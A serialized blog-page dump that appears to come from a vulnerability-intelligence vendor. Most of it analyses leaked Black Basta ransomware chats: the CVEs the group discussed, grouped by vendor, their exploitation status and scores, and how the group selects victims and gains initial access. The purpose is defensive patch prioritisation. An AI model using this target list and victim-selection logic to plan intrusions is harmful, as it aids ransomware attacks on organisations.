,53795,53797,53799,53801,53803,53805,53807,53809,53811],{"class":1375,"line":7640},[1373,53768,46347],{"class":2206},[1373,53770,46350],{"class":1391},[1373,53772,46353],{"class":4640},[1373,53774,46356],{"class":2326},[1373,53776,46359],{"class":4640},[1373,53778,46362],{"class":2326},[1373,53780,46365],{"class":4640},[1373,53782,46368],{"class":2326},[1373,53784,46371],{"class":4640},[1373,53786,46374],{"class":2326},[1373,53788,46377],{"class":4640},[1373,53790,46380],{"class":2326},[1373,53792,46383],{"class":4640},[1373,53794,46386],{"class":2326},[1373,53796,46389],{"class":4640},[1373,53798,46392],{"class":2326},[1373,53800,46395],{"class":4640},[1373,53802,46398],{"class":2326},[1373,53804,46401],{"class":4640},[1373,53806,46404],{"class":2326},[1373,53808,46407],{"class":4640},[1373,53810,46410],{"class":1397},[1373,53812,53813],{"class":4640},"^C\n",[18,53815,53816],{},"Sometimes an incorrectly categorized CVSS vector is all it takes to motivate you to find something interesting.",[61,53818,202],{"id":201},[18,53820,53821,53822,1246,53827,1246,53831,1246,53835,53839,53840],{},"The VulnCheck Initial Access team is always on the lookout for new exploitation in the wild. For more research like this, see our blogs, ",[47,53823,53826],{"href":53824,"rel":53825},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Ffour-faith-cve-2024-12856",[51],"Four-Faith Industrial Router CVE-2024-12856 Exploited in the Wild",[47,53828,40447],{"href":53829,"rel":53830},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fpapercut-rce",[51],[47,53832,36637],{"href":53833,"rel":53834},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fprojectsend-exploited-itw",[51],[47,53836,35931],{"href":53837,"rel":53838},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fjuniper-cve-2023-36845",[51],"\n, and ",[47,53841,22211],{"href":53842,"rel":53843},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fconfluence-dreams-of-shells",[51],[18,53845,53846,53847,53850,53851,982,53854,1260],{},"Sign up to our website today to get free access to our ",[47,53848,1233],{"href":2871,"rel":53849},[51]," and request a trial of our ",[47,53852,1245],{"href":45535,"rel":53853},[51],[47,53855,216],{"href":214,"rel":53856},[51],[2901,53858,53859],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .snv6S, html code.shiki .snv6S{--shiki-light:#E53935;--shiki-light-font-style:inherit;--shiki-default:#B31D28;--shiki-default-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic;--shiki-sepia:#F44747;--shiki-sepia-font-style:inherit}html pre.shiki code .s_lYk, html code.shiki .s_lYk{--shiki-light:#9C3EDA;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sHsBP, html code.shiki .sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sSBr1, html code.shiki .sSBr1{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .s41CE, html code.shiki .s41CE{--shiki-light:#F76D47;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .s6MXs, html code.shiki .s6MXs{--shiki-light:#E2931D;--shiki-light-font-style:italic;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sNSxj, html code.shiki .sNSxj{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sv8o3, html code.shiki .sv8o3{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#F8F8F2}html pre.shiki code .s91G_, html code.shiki .s91G_{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#F8F8F2}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .shWJe, html code.shiki .shWJe{--shiki-light:#F76D47;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sTNss, html code.shiki .sTNss{--shiki-light:#9C3EDA;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sn17v, html code.shiki .sn17v{--shiki-light:#E2931D;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .sfFRu, html code.shiki .sfFRu{--shiki-light:#8796B0;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sRsjY, html code.shiki .sRsjY{--shiki-light:#39ADB5;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .s9BUQ, html code.shiki .s9BUQ{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}",{"title":219,"searchDepth":220,"depth":220,"links":53861},[53862,53863,53864,53865,53866,53867,53868],{"id":45528,"depth":220,"text":45529},{"id":46436,"depth":220,"text":46437},{"id":48835,"depth":220,"text":48836},{"id":49587,"depth":220,"text":49588},{"id":52400,"depth":220,"text":52401},{"id":52518,"depth":220,"text":52519},{"id":201,"depth":220,"text":202},"2025-02-27","VulnCheck identifies an unauthenticated remote code execution in the BigAnt chat server",{"slug":53872},"bigant-cve-2025-0364","\u002Fblog\u002Fbigant-cve-2025-0364",{"title":45509,"description":53870},"blog\u002Fbigant-cve-2025-0364",[242,1281],"knMHqzgd7RJAfpCO784qLkW8MLHfCAeaZKATJBy2qF0",{"id":53879,"title":53880,"articles":53881,"authors":53923,"body":53925,"date":54484,"description":53957,"extension":234,"image":7,"link":7,"meta":54485,"navigation":237,"path":54487,"seo":54488,"series":7,"stem":54489,"subtype":7,"tags":54490,"__hash__":54491},"blog\u002Fblog\u002Fblack-basta-chats.md","Exposing CVEs from Black Bastas' Chats",[53882,53887,53891,53894,53897,53902,53906,53910,53913,53918],{"title":53883,"source":53884,"link":53885,"date":53886},"Black Basta ransomware leak sheds light on targets, tactics","Tech Target","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366619641\u002FBlack-Basta-ransomware-leak-sheds-light-on-targets-tactics","2025-02-25",{"title":53888,"source":3495,"link":53889,"date":53890},"Risky Bulletin: Signal threatens to leave Sweden over backdoor request","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-signal-threatens-to-leave-sweden-over-backdoor-request\u002F","2025-02-26",{"title":53892,"source":14386,"link":53893,"date":53869},"23 Vulnerabilities in Black Basta’s Chat Logs Exploited in the Wild, Including PAN-OS, Cisco IOS, & Exchange","https:\u002F\u002Fcybersecuritynews.com\u002F23-vulnerabilities-black-basta-chat\u002F",{"title":53895,"source":10841,"link":53896,"date":53869},"Leaked ransomware chat logs reveal Black Basta’s targeted CVEs","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fleaked-ransomware-chat-logs-reveal-black-bastas-targeted-cves\u002F741129\u002F",{"title":53898,"source":53899,"link":53900,"date":53901},"Leaked chats from Black Basta expose targets and tactics","Bob's Guide","https:\u002F\u002Fwww.bobsguide.com\u002Fleaked-chats-from-black-basta-expose-targets-and-tactics\u002F","2025-02-28",{"title":53903,"source":53904,"link":53905,"date":53901},"Black Basta Ransomware Tactics Breach Microsoft, and Others","Inside Telecom","https:\u002F\u002Finsidetelecom.com\u002Fransomware-tactics-exploiting-critical-technological-vulnerabilities\u002F",{"title":53907,"source":3486,"link":53908,"date":53909},"Ransomware access playbook: What Black Basta’s leaked logs reveal","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F3836040\u002Fransomware-access-playbook-what-black-bastas-leaked-logs-reveal.html","2025-03-03",{"title":53911,"source":14378,"link":53912,"date":53909},"Black Basta Leak Offers Glimpse Into Group’s Inner Workings","https:\u002F\u002Fwww.securityweek.com\u002Fblack-basta-leak-offers-glimpse-into-groups-inner-workings\u002F",{"title":53914,"source":53915,"link":53916,"date":53917},"VulnCheck Exposes CVEs from Black Bastas’ Chats","InformationSecurityBuzz","https:\u002F\u002Finformationsecuritybuzz.com\u002Fvulncheck-exposes-cve-from-black-basta\u002F","2025-03-04",{"title":53919,"source":53920,"link":53921,"date":53922},"Deciphering Black Basta’s Infrastructure from the Chat Leak","Channel E2E","https:\u002F\u002Fwww.channele2e.com\u002Fnative\u002Fdeciphering-black-bastas-infrastructure-from-the-chat-leak","2025-03-31",[53924],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":53926,"toc":54472},[53927,53933,53935,53955,53958,53961,53965,53971,53974,54113,54116,54148,54151,54155,54161,54164,54199,54203,54210,54214,54217,54220,54225,54241,54246,54254,54259,54267,54272,54280,54285,54296,54301,54309,54314,54322,54325,54329,54343,54348,54352,54355,54375,54378,54382,54385,54447,54451,54461,54463,54465,54467],[18,53928,53929],{},[68,53930],{"alt":53931,"src":53932,"width":28205},"Black Basta","\u002Fblog\u002Fblack-basta-chats\u002Fblack-basta-profile.png",[61,53934,20],{"id":3520},[22,53936,53937,53940,53946,53949,53952],{},[25,53938,53939],{},"62 unique CVEs were mentioned in the Black Basta chat logs.",[25,53941,53942,53943,59],{},"53 of the 62 CVEs (85.5%) are known to be exploited and are listed in ",[47,53944,1233],{"href":2871,"rel":53945},[51],[25,53947,53948],{},"44 of the CVEs (70.9%) appear in the CISA KEV catalog.",[25,53950,53951],{},"Black Basta shows a clear preference for targets with known weaknesses, focusing on vulnerabilities that already have available exploits.",[25,53953,53954],{},"The group seems to favor widely adopted enterprise technologies, including products like Citrix NetScaler, Confluence Atlassian, Fortinet, Cisco, Palo Alto, CheckPoint, and Microsoft Windows.",[18,53956,53957],{},"Late last week, chat logs from Black Basta became available, offering rare insight into the operations of one of the most infamous ransomware groups. This research focuses on the vulnerabilities and CVEs mentioned in these logs, with the goal of providing defenders with actionable intelligence on the tactics of Black Basta.",[18,53959,53960],{},"The initial phase involved collecting all CVEs referenced in the chats. Although there were discussions about discovering new vulnerabilities, it became evident that Black Basta generally prioritizes known weaknesses, often leveraging available tools and proof-of-concept exploits. It is important to note that a mention of a CVE in the chat does not necessarily mean that it was used in an attack.",[61,53962,53964],{"id":53963},"possible-black-basta-targets-mentioned-vendors-products","Possible Black Basta Targets Mentioned: Vendors & Products",[18,53966,53967],{},[68,53968],{"alt":53969,"src":53970,"width":28205},"Black Basta by Vendor and Product","\u002Fblog\u002Fblack-basta-chats\u002Fblack-basta-vendors.png",[18,53972,53973],{},"Black Basta appears to be targeting a mix of initial access devices and Microsoft technologies:",[22,53975,53976,53982,53988,53994,54000,54006,54012,54018,54024,54030,54036,54042,54048,54054,54060,54066,54072,54078,54084,54089,54095,54101,54107],{},[25,53977,53978,53981],{},[295,53979,53980],{},"Fortinet:"," CVE-2024-23109, CVE-2024-23108, CVE-2024-21762, CVE-2024-23113",[25,53983,53984,53987],{},[295,53985,53986],{},"Citrix Netscaler:"," CVE-2023-3519, CVE-2023-3467, CVE-2023-3466, CVE-2023-4966",[25,53989,53990,53993],{},[295,53991,53992],{},"Palo Alto Networks Pan-OS:"," CVE-2024-3400",[25,53995,53996,53999],{},[295,53997,53998],{},"Checkpoint:"," CVE-2024-24919",[25,54001,54002,54005],{},[295,54003,54004],{},"F5 Big-IP:"," CVE-2022-1388",[25,54007,54008,54011],{},[295,54009,54010],{},"Juniper OS:"," CVE-2023-36845, CVE-2023-36844",[25,54013,54014,54017],{},[295,54015,54016],{},"Connectwise:"," CVE-2024-1709, CVE-2024-1708",[25,54019,54020,54023],{},[295,54021,54022],{},"Microsoft Windows:"," CVE-2020-1472, CVE-2021-40444, CVE-2021-42287, CVE-2021-42278, CVE-2022-30190, CVE-2022-37969, CVE-2023-36874, CVE-2023-36884, CVE-2024-21338, CVE-2024-26169, CVE-2023-36394, CVE-2023-35628",[25,54025,54026,54029],{},[295,54027,54028],{},"Zyxel:"," CVE-2022-30525",[25,54031,54032,54035],{},[295,54033,54034],{},"Atlassian Confluence"," CVE-2021-44228, CVE-2024-21683, CVE-2023-22515, CVE-2022-26134",[25,54037,54038,54041],{},[295,54039,54040],{},"Brick Builders Wordpress Theme"," CVE-2024-25600",[25,54043,54044,54047],{},[295,54045,54046],{},"Cisco:"," CVE-2023-20198",[25,54049,54050,54053],{},[295,54051,54052],{},"Gitlab:"," CVE-2023-7028",[25,54055,54056,54059],{},[295,54057,54058],{},"Google Chrome:"," CVE-2022-0609",[25,54061,54062,54065],{},[295,54063,54064],{},"Intel:"," cve-2017-5754, cve-2017-5753",[25,54067,54068,54071],{},[295,54069,54070],{},"JetBrains"," CVE-2024-27198",[25,54073,54074,54077],{},[295,54075,54076],{},"Jenkins"," CVE-2024-23897",[25,54079,54080,54083],{},[295,54081,54082],{},"Linux"," CVE-2024-1086",[25,54085,54086,54088],{},[295,54087,54070],{}," CVE-2023-42793",[25,54090,54091,54094],{},[295,54092,54093],{},"RARLAB"," CVE-2023-38831",[25,54096,54097,54100],{},[295,54098,54099],{},"VMware Spring"," CVE-2022-22965",[25,54102,54103,54106],{},[295,54104,54105],{},"Microsoft SharePoint"," CVE-2023-29357",[25,54108,54109,54112],{},[295,54110,54111],{},"Microsoft Office"," CVE-2023-23397, CVE-2023-21716, CVE-2017-11882",[18,54114,54115],{},"Black Basta appears to also target email and communication services including:",[22,54117,54118,54124,54130,54136,54142],{},[25,54119,54120,54123],{},[295,54121,54122],{},"Microsoft Exchange:"," CVE-2021-26855, CVE-2021-28482, CVE-2021-42321, CVE-2022-41040, CVE-2022-41082, CVE-2023-36745",[25,54125,54126,54129],{},[295,54127,54128],{},"Microsoft Outlook:"," CVE-2024-21378, CVE-2024-21413",[25,54131,54132,54135],{},[295,54133,54134],{},"Exim:"," CVE-2023-42115",[25,54137,54138,54141],{},[295,54139,54140],{},"Zimbra:"," CVE-2022-27925, CVE-2022-37042, CVE-2022-41352",[25,54143,54144,54147],{},[295,54145,54146],{},"WordPress SMTP plugins:"," CVE-2023-6875, CVE-2023-7027",[18,54149,54150],{},"These email services offer relatively safe vectors for phishing campaigns and can provide initial access into organizations networks.",[61,54152,54154],{"id":54153},"how-quickly-and-at-what-frequency-are-cves-being-discussed-by-black-basta","How Quickly and at what frequency are CVEs being discussed by Black Basta?",[18,54156,54157],{},[68,54158],{"alt":54159,"src":54160,"width":28205},"Frequency of CVE discussions","\u002Fblog\u002Fblack-basta-chats\u002Fblack_basta_mentions.png",[18,54162,54163],{},"Analyzing the timeline between the publication of CVEs and their first mention in the chats provides insight into Black Basta’s targeting speed:",[22,54165,54166,54172,54189],{},[25,54167,54168,54171],{},[295,54169,54170],{},"Rapid Response:"," Within days of new security advisories being issued, members discussed vulnerabilities related to products such as Citrix NetScaler, Check Point Quantum Security Gateways, ConnectWise ScreenConnect, Microsoft Office Outlook, Fortinet FortiSIEM, Palo Alto Networks PAN-OS, Atlassian Confluence Server and Data Center, Cisco IOS XE Web UI, Microsoft Windows, GitLab CE\u002FEE, and Fortinet FortiOS.",[25,54173,54174,54177,54178],{},[295,54175,54176],{},"Pre-Publication Mentions:","Interestingly, three CVEs were discussed before their official publication:\n",[22,54179,54180,54183,54186],{},[25,54181,54182],{},"Fortinet FortiOS (CVE-2024-23113)",[25,54184,54185],{},"Bricks Builder WordPress Theme (CVE-2024-25600)",[25,54187,54188],{},"Exim Email (CVE-2023-42115)\nAccording to VulnCheck, while these CVE IDs were included in product security advisories, there was a delay in the official publication by the CVE numbering authority.",[25,54190,54191,54194,54195],{},[295,54192,54193],{},"Older Vulnerabilities:"," A number of older vulnerabilities also appeared in the chats, often as part of a “Top 10 of 2022” list that highlighted widely exploited issues. One CVE was even described as “Old but not forgotten.”\n",[68,54196],{"alt":54197,"src":54198},"Top 10 2022","\u002Fblog\u002Fblack-basta-chats\u002Fblack_basta_2022.png",[61,54200,54202],{"id":54201},"how-do-epss-and-cvss-score-the-mentioned-cves","How Do EPSS and CVSS Score the Mentioned CVEs?",[18,54204,54205,54209],{},[68,54206],{"alt":54207,"src":54208,"width":28205},"EPSS and CVSS","\u002Fblog\u002Fblack-basta-chats\u002Fblackbasta_scoring.png","\nWe mapped CVSS and EPSS to the CVEs discovered in the Black Basta logs using a scatter plot. The distribution highlights both CVSS and EPSS have broad scoring distribution among the CVEs mentioned.",[61,54211,54213],{"id":54212},"are-all-cves-discussed-known-to-be-exploited-or-used-by-black-basta","Are All CVEs Discussed Known to be Exploited or Used by Black Basta?",[18,54215,54216],{},"Of the 62 unique CVEs mentioned by Black Basta, VulnCheck KEV tracks 53 of the vulnerabilities as confirmed as being exploited in the wild.",[18,54218,54219],{},"Below are some notable observations on the nine CVEs where there was previously no evidence of exploitation:",[18,54221,54222],{},[295,54223,54224],{},"CVE-2017-5754 & CVE-2017-5753 (Intel Vulnerabilities):",[22,54226,54227,54235,54238],{},[25,54228,54229,54230,59],{},"Referenced in a ",[47,54231,54234],{"href":54232,"rel":54233},"https:\u002F\u002Fwww.dell.com\u002Fsupport\u002Fkbdoc\u002Fde-ch\u002F000178106\u002Fseitenkanal-sicherheitsluecken-von-mikroprozessoren-cve-2017-5715-cve-2017-5753-und-cve-2017-5754-auswirkungen-auf-dell-emc-server-storage-und-netzwerke#bios",[51],"Dell advisory",[25,54236,54237],{},"CVE-2017-5754 features a weaponized Core Impact exploit and four PoC exploits; CVE-2017-5753 has eight PoC exploits.",[25,54239,54240],{},"Both have EPSS scores exceeding 0.97, suggesting they should be prioritized with urgency.",[18,54242,54243],{},[295,54244,54245],{},"CVE-2024-21378 (Microsoft Outlook RCE):",[22,54247,54248,54251],{},[25,54249,54250],{},"Black Basta confirmed it works in a production environment. “We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well!”",[25,54252,54253],{},"Four PoC exploits exist, its EPSS score is very low (0.00064).",[18,54255,54256],{},[295,54257,54258],{},"CVE-2023-7027 (WordPress Plugin Vulnerability):",[22,54260,54261,54264],{},[25,54262,54263],{},"Identified as one of two options to compromise SMTP services on Wordpress.",[25,54265,54266],{},"Three PoC exploits are available, the EPSS score remains low (0.00263).",[18,54268,54269],{},[295,54270,54271],{},"CVE-2023-36394 (Microsoft Windows):",[22,54273,54274,54277],{},[25,54275,54276],{},"Black Basta considered purchasing an exploit for this CVE.",[25,54278,54279],{},"No known PoC exploits exist that we are aware of, and the EPSS score is elevated at 0.28553.",[18,54281,54282],{},[295,54283,54284],{},"CVE-2024-23109 & CVE-2024-23108 (FortiSIEM Vulnerabilities):",[22,54286,54287,54290,54293],{},[25,54288,54289],{},"Both were highlighted due to their perfect CVSS scores of 10.",[25,54291,54292],{},"CVE-2024-23108 has three PoC exploits, none have been observed for CVE-2024-23109.",[25,54294,54295],{},"Both share low EPSS scores (0.00124).",[18,54297,54298],{},[295,54299,54300],{},"CVE-2023-35628 (Microsoft Windows Vulnerability):",[22,54302,54303,54306],{},[25,54304,54305],{},"Comes with three PoC exploits and an EPSS score of 0.00213.",[25,54307,54308],{},"An MSRC link was provided for further details.",[18,54310,54311],{},[295,54312,54313],{},"CVE-2023-42115 (Exim Email Server Vulnerability):",[22,54315,54316,54319],{},[25,54317,54318],{},"Reiterated in the chats as a prime target, one comment noted, “SMTP, but I didn’t find a single PoC, I'm collecting all Exim servers.”",[25,54320,54321],{},"Its EPSS score is 0.00075.",[18,54323,54324],{},"After remediating all vulnerabilities confirmed to be exploited in the wild, those found in VulnCheck KEV, it would then be advisable to treat any of the CVEs mentioned in the Black Basta chats as if they are being exploited in the wild.",[61,54326,54328],{"id":54327},"cve-2024-21683-rejected-by-cveorg","CVE-2024-21683 Rejected by CVE.org",[18,54330,54331,54332,54337,54338,59],{},"Black Basta also mentions Atlassian Confluence ",[47,54333,54336],{"href":54334,"rel":54335},"https:\u002F\u002Fvulncheck.com\u002Fcve\u002FCVE-2024-21683",[51],"CVE-2024-21683"," which is listed by CVE.org as rejected, but there is evidence of exploitation from Shadow Server, available exploits including a MetaSploit module for this CVE, and a ",[47,54339,54342],{"href":54340,"rel":54341},"https:\u002F\u002Fjira.atlassian.com\u002Fbrowse\u002FCONFSERVER-95832",[51],"Atlassian vendor security advisory",[18,54344,54345],{},[68,54346],{"alt":54336,"src":54347},"\u002Fblog\u002Fblack-basta-chats\u002Frejected-cve.png",[61,54349,54351],{"id":54350},"what-other-vulnerabilities-and-tools-might-be-being-used-by-blackbasta","What other vulnerabilities and tools might be being used by Blackbasta?",[18,54353,54354],{},"Beyond the CVEs identified in the chats, there is evidence that Black Basta employs a broader arsenal of exploits while targeting vulnerabilities:",[22,54356,54357,54363,54369],{},[25,54358,54359,54362],{},[295,54360,54361],{},"Opportunistic Exploitation:","\nThe group appears to favor existing vulnerabilities and readily available PoC exploits for initial access, particularly targeting email services.",[25,54364,54365,54368],{},[295,54366,54367],{},"Tooling and Techniques:","\nDiscussions frequently reference tools and platforms such as ZoomInfo, ChatGPT, GitHub, Shodan, Fofa, Metasploit, Core Impact, Cobalt Strike, and Nuclei among other tools. A mix of offensive and defensive security tools underscores the group’s flexible, opportunistic approach.",[25,54370,54371,54374],{},[295,54372,54373],{},"Exploit Development & Acquisition:","\nIn addition to using known exploits, there is evidence suggesting that Black Basta has the resources to develop new exploits. On several occasions, they also considered purchasing exploits from external groups with hesitancy.",[18,54376,54377],{},"This opportunistic behavior reinforces the importance of promptly fixing vulnerabilities that are known to be weaponized in any exploit framework or security tool.",[61,54379,54381],{"id":54380},"additional-observations","Additional Observations",[18,54383,54384],{},"Black Basta selects its targets based on several key factors:",[22,54386,54387,54401,54412,54420,54431,54439],{},[25,54388,54389,54390],{},"Financial Viability and Ransom Payment Potential:\n",[22,54391,54392,54395,54398],{},[25,54393,54394],{},"The group tends to prioritize high-revenue companies over a large number of random targets.",[25,54396,54397],{},"Discussions suggest that fewer high-profile targets generate more revenue than mass-targeting lower-value entities.",[25,54399,54400],{},"There is a clear emphasis on targeting organizations that are more likely to pay ransoms.",[25,54402,54403,54404],{},"Vulnerability-Based Targeting:\n",[22,54405,54406,54409],{},[25,54407,54408],{},"They discuss specific exploits for initial access and email services, indicating a preference for targets with known weaknesses.",[25,54410,54411],{},"Pre-attack reconnaissance includes checking domain and infrastructure vulnerabilities.",[25,54413,54414,54415],{},"Industry-Specific Selection:\n",[22,54416,54417],{},[25,54418,54419],{},"Sectors such as legal, financial, healthcare, and industrial companies, typically handling sensitive data, are frequently targeted due to their higher likelihood of paying to protect client confidentiality.",[25,54421,54422,54423],{},"Access to Initial Compromise:\n",[22,54424,54425,54428],{},[25,54426,54427],{},"Decisions often hinge on whether initial access is available. This includes leveraging exposed RDP, Citrix, VPN, or email credentials.",[25,54429,54430],{},"Some attacks begin with methods like credential stuffing or brute-force attempts.",[25,54432,54433,54434],{},"Geographical Considerations:\n",[22,54435,54436],{},[25,54437,54438],{},"Although Black Basta claims to be apolitical, discussions imply that they may selectively target companies in regions with specific financial or regulatory environments.",[25,54440,54441,54442],{},"Use of Stolen Data for Secondary Extortion:\n",[22,54443,54444],{},[25,54445,54446],{},"In certain cases, the group discusses selling stolen data to competitors or foreign entities, highlighting the attractiveness of targets with valuable intellectual property or business secrets.",[61,54448,54450],{"id":54449},"final-thoughts-on-the-black-basta-chats","Final Thoughts on the Black Basta Chats",[18,54452,54453,54455,54456,59],{},[68,54454],{"alt":53931,"src":53932,"width":28205},"\nThe analysis of Black Basta's chat logs reveals a methodical yet opportunistic approach that focuses on well-known vulnerabilities and high-value targets. While the group leverages established exploit frameworks and readily available tools, their discussions also suggest potential for new exploit development and tactical shifts. For defenders, the key takeaway is to prioritize the remediation of vulnerabilities using an ",[47,54457,54460],{"href":54458,"rel":54459},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fvulnerability-prioritization",[51],"evidence based 